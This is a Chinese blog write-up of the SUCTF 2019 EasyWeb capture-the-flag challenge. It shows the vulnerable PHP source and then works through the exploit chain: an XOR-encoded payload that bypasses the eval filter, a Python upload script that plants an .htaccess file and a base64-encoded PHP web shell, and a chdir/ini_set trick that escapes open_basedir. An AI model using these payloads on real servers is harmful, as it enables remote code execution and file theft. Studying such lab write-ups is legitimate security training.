[SUCTF 2019]EasyWeb(bypass open_basedir)

最新推荐文章于 2024-05-07 10:54:59 发布
原创 最新推荐文章于 2024-05-07 10:54:59 发布 · 322 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

本文详细介绍了如何通过分析PHP源码,找出并绕过安全过滤,执行eval函数。首先,利用字符异或构造特殊字符串绕过_WAF_检查,然后通过上传.htaccess文件和恶意PHP文件,利用open_basedir限制的漏洞,逐步提升权限。尽管最终无法获取到真实flag,但展示了Web安全中的常见技巧和思路。 
<?php
function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!! 
    $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
    if(!file_exists($userdir)){
    mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
    if(preg_match("/ph/i",$extension)) die("^_^"); 
        if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
    if(!exif_imagetype($tmp_name)) die("^_^"); 
        $path= $userdir."/".$name;
        @move_uploaded_file($tmp_name, $path);
        print_r($path);
    }
}

$hhh = @$_GET['_'];

if (!$hhh){
    highlight_file(__FILE__);
}

if(strlen($hhh)>18){
    die('One inch long, one inch strong!');
}

if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
    die('Try something else!');

$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");

eval($hhh);
?>

直接给了源码,快速看了一下,过滤了字母数字,有个get_the_flag()函数,然后最后执行eval,所以思路很显然就是绕过WAF,执行eval函数

再看get_the_flag()函数,是个文件上传点,三段检测,过滤了 .ph 后缀,还有 <? ,最后还会判断是否是图像头

第一步

首先先不管get_the_flag上传怎么绕过,先考虑怎么绕过 eval的检测,想办法去执行eval

知识点

想法是构造这样的形式去执行函数 ?_=$_GET[a]();&a=phpinfo
不知道大家记不记得在php中 ?_=${_GET}{a}() 等价于 $_GET[a]()
用 { }绕过了对 [ ]的检测,其次就是如何构造_GET去绕过对字母的检测
可以使用异或来替换,就像 1^2=2^1
<?php
$l = "";
$r = "";
$argv = str_split("_GET");	# 把 _GET拆开成数组
for($i=0;$i<count($argv);$i++){   
    for($j=0;$j<255;$j++)
    {
        $k = chr($j)^chr(255);    ##进行异或         
        if($k == $argv[$i]){
            if($j<16){  
            #j如果小于16就代表只需一位即可表示,但是url要求是2位所以补个0
                $l .= "%ff";
                $r .= "%0" . dechex($j);
            }
            $l .= "%ff";
            $r .= "%" . dechex($j);
        }
    }
}
echo "\{$l^$r\}";
?>
// 输出结果 {%ff%ff%ff%ff^%A0%B8%BA%AB}

所以 {%ff%ff%ff%ff^%A0%B8%BA%AB} 就是我们构造出的 {_GET}

完整payload去测试一下phpinfo,成功回显
?_=${%A0%B8%BA%AB^%ff%ff%ff%ff}{%ff}();&%ff=phpinfo

eval可以被成功执行,那就成功一半了,现在就是要让eval去执行get_the_flag函数
在这里插入图片描述

第二步

import requests
import base64

htaccess = b"""
#define width 1337
#define height 1337 
AddType application/x-httpd-php .paidx
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_b6e4ebe3b596f721b7308036349a1ccf/shell.paidx"
"""
shell = b"GIF89a12" + base64.b64encode(b"<?php eval($_REQUEST['a']);?>")
url = "http://45a73175-c06e-41cc-b571-06eab34dd22a.node4.buuoj.cn:81/?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag"

data = {"upload": "Submit"}
files = {'file': ('.htaccess', htaccess, 'image/jpeg')}

response = requests.post(url=url, data=data, files=files)
print(response.text)

files = {'file': ('shell.paidx', shell, 'image/jpeg')}
response = requests.post(url=url, data=data, files=files)
print(response.text)

首先是先把我们的 shell 传上去,我对一句话进行了一下base64,其他编码也行,主要是绕过对<? 的检测
在这里插入图片描述
然后就是上传.htaccess ,把所有 .paidx后缀的文件解析成php文件,并且自动加载导入我们的shell
在这里插入图片描述
在这里插入图片描述
可以看到蚁剑是可以成功连上的,但是又有一个新的问题

就是我们没有权限去到根目录下找flag,只有一个假flag
在这里插入图片描述
在这里插入图片描述
到这就不会了,看了大师傅们的WP知道这里是做了open_basedir的限制

upload/tmp_86580586cfedc818f0ed1967b7bfe13d/shell.paidx?a=chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');print_r(file_get_contents('/THis_Is_tHe_F14g'));

首先构造一个相对可以上跳的open_basedir

我们这里有上跳的路径我们直接 chdir("img")

然后每次操作chdir("..")都会进一次open_basedir的比对由于相对路径的问题,每次open_basedir的补全都会上跳。

比如初始open_basedir为/a/b/c/d:

第一次chdir后变为/a/b/c,第二次chdir后变为/a/b,第三次chdir后变为/a 第四次chdir后变为/

那么这时候再进行ini_set,调整open_basedir为/即可通过php_check_open_basedir_ex的校验成功覆盖,导致我们可以bypass open_basedir。
在这里插入图片描述

Bypass open_basedir
qq_44657899的博客
10-19 1735
文章目录利用chdir()与ini_set()组合Bypass利用glob://伪协议Bypass 利用chdir()与ini_set()组合Bypass payload: 获取目录: ?a=chdir(%27img%27);ini_set(%27open_basedir%27,%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);ini_set(%27open_basedir%27,%27/%27);print_
141,【1】buuctf web [SUCTF 2019]EasyWeb
最新发布
2402_87039650的博客
02-15 307
实现了文件上传功能,并对上传文件进行了一些限制和检查。
CTF训练计划—[CISCN2019]Easyweb
Lemon's blog
08-14 1626
前言: 这道题学到不少知识,还卡了很长时间,单独记录一下 [CISCN2019]Easyweb 首先拿到一个登陆框,从这里就要思考是要怎么去做,我在做的时候想到三个方面去尝试 burp抓包看有什么线索没 SQL万能密码注入 页面扫描,看看有什么源码泄露或者robots.txt 前两个都行不通,刚开始页面扫描的时候也没有扫到什么,然后就彻底懵了,后来发现是工具犯病了,再扫一次就出来了 一个robots.txt文件,访问可以发现提示的是备份文件,但没说具体的文件名 就利用排除法,一个一个的去试试,目前知
bypass open_basedir
eT48_Sec
02-06 975
在了解symlink() bypass open_basedir 的原理后,自己写的代码。在kali-Linux 上测试通过,Windows在路径的处理上需要修改一下。 <?php /* titile: bypass open_basedir auth: eT48 */ header("Conten-type:text/html; charset:udf-8"); error_repor
绕过open_basedir
unexpectedthing的博客
07-02 1996
open_basedir绕过
Bypass open_basedir的方法
rev1ve的博客
11-27 1612
指定在每个 PHP 脚本执行完毕后自动追加的文件,用php伪协议去读取我们编码过的马,其中木马添加00是为了满足解码字节倍数,然后就是文件头绕过。payload构造的注意点就是:要读的文件需要往前跨多少路径,就得创建多少层的子目录,然后输入多少个…题目是给了我们get_the_flag()函数的,对文件上传进行检测。,检测文件头,然后回显上传路径;symlink() 函数创建一个从指定名称连接的现存目标文件开始的符号连接。发现可以异或绕过,但是考虑限制长度,我们构造如下。本地测试一下,这里我设置的路径。
[SUCTF 2019]EasyWeb【chdir()绕过open_basedir
D.MIND 的博客
04-24 655
文章目录异或绕过正则方法一:phpinfo()方法二:`.htaccess`配合`php://filter`用python文件上传:open_basedir:利用chdir()绕过总结: <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if
[SUCTF 2019]EasyWeb hao .htacess绕过 open_basedir绕过
Je3Z的博客
08-02 652
很好的一个题考了很多知识点 rce异或绕过 .htacess绕过 open_basedir绕过 <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userdir)){ mkdir($userdir);
Buu - [SUCTF 2019]EasyWeb
夜风的博客
05-07 632
> 这个函数两个参数,第一个参数提供字符串,第二个提供统计模式(0, 1, 2, 3) 0是默认值-> 1:返回字符串中每个字节出现的次数;3:以整数形式返回。
[SUCTF 2019]EasyWeb
Sk1y的博客
02-08 1666
[SUCTF 2019]EasyWeb 知识点:文件上传,htaccess绕过 文章目录[SUCTF 2019]EasyWeb解题过程跑出可用的字符异或绕过源码中的几个函数.htaccess进行绕过参考链接 解题过程 打开题目就是源码审计 <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERV
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值